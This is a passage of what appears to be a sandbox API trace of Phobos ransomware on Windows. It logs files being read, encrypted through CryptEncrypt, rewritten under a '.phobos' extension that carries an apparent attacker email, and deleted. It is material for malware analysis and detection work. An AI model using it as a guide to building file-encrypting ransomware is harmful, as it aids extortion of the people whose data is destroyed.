"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\chrome_throbber_fast_16[1].gif")) returned 0x2020 [0184.461] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\chrome_throbber_fast_16[1].gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\chrome_throbber_fast_16[1].gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.461] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\chrome_throbber_fast_16[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\chrome_throbber_fast_16[1].gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0184.461] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.461] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.461] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\chrome_throbber_fast_16[1].gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\chrome_throbber_fast_16[1].gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.462] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0184.462] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.462] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x60c, lpOverlapped=0x0) returned 1 [0184.607] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x610, dwBufLen=0x610 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x610) returned 1 [0184.607] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x610, lpOverlapped=0x0) returned 1 [0184.608] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a68) returned 1 [0184.608] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.608] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0184.608] CryptDestroyKey (hKey=0xa32a68) returned 1 [0184.608] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x112, lpOverlapped=0x0) returned 1 [0184.608] CryptDestroyKey (hKey=0xa327e8) returned 1 [0184.608] CloseHandle (hObject=0x140) returned 1 [0184.608] CloseHandle (hObject=0xb8) returned 1 [0184.608] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\chrome_throbber_fast_16[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\chrome_throbber_fast_16[1].gif")) returned 1 [0184.609] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0184.609] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.610] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67) returned 1 [0184.610] CloseHandle (hObject=0xb8) returned 1 [0184.610] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\desktop.ini")) returned 0x2006 [0184.610] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.610] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.610] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0184.611] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0184.611] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.611] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x43, lpOverlapped=0x0) returned 1 [0184.613] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0184.613] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x50, lpOverlapped=0x0) returned 1 [0184.614] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a68) returned 1 [0184.614] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.614] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0184.614] CryptDestroyKey (hKey=0xa32a68) returned 1 [0184.614] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0184.614] CryptDestroyKey (hKey=0xa327e8) returned 1 [0184.614] CloseHandle (hObject=0xb8) returned 1 [0184.614] CloseHandle (hObject=0x140) returned 1 [0184.614] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\desktop.ini")) returned 1 [0184.619] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0184.619] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\eula-mac[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\eula-mac[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0184.619] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=18618) returned 1 [0184.619] CloseHandle (hObject=0x140) returned 1 [0184.619] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\eula-mac[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\eula-mac[1].jpg")) returned 0x2020 [0184.619] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\eula-mac[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\eula-mac[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.619] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\eula-mac[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\eula-mac[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0184.619] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.619] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\eula-mac[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\eula-mac[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.620] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0184.620] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.620] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x48ba, lpOverlapped=0x0) returned 1 [0184.632] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x48c0, dwBufLen=0x48c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x48c0) returned 1 [0184.632] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x48c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x48c0, lpOverlapped=0x0) returned 1 [0184.633] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0184.633] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.633] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0184.633] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.633] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0184.633] CryptDestroyKey (hKey=0xa327e8) returned 1 [0184.633] CloseHandle (hObject=0x140) returned 1 [0184.633] CloseHandle (hObject=0xb8) returned 1 [0184.633] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\eula-mac[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\eula-mac[1].jpg")) returned 1 [0184.634] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0184.634] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ga[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\ga[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.635] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=43082) returned 1 [0184.635] CloseHandle (hObject=0xb8) returned 1 [0184.635] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ga[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\ga[1].js")) returned 0x2020 [0184.635] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ga[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\ga[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ga[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\ga[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.636] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.636] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ga[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\ga[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0184.636] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0184.636] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.636] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xa84a, lpOverlapped=0x0) returned 1 [0184.645] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa850, dwBufLen=0xa850 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa850) returned 1 [0184.645] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xa850, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xa850, lpOverlapped=0x0) returned 1 [0184.649] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0184.649] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.649] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0184.649] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.649] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0184.649] CryptDestroyKey (hKey=0xa327e8) returned 1 [0184.649] CloseHandle (hObject=0xb8) returned 1 [0184.654] CloseHandle (hObject=0x140) returned 1 [0184.654] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ga[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\ga[1].js")) returned 1 [0184.655] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0184.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\modernizr[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\modernizr[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.658] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=18121) returned 1 [0184.658] CloseHandle (hObject=0xb8) returned 1 [0184.658] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\modernizr[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\modernizr[1].js")) returned 0x2020 [0184.658] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\modernizr[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\modernizr[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.658] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\modernizr[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\modernizr[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.658] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.658] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.658] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\modernizr[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\modernizr[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0184.659] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0184.659] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.659] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x46c9, lpOverlapped=0x0) returned 1 [0184.666] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x46d0, dwBufLen=0x46d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x46d0) returned 1 [0184.666] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x46d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x46d0, lpOverlapped=0x0) returned 1 [0184.667] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa328a8) returned 1 [0184.667] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.667] 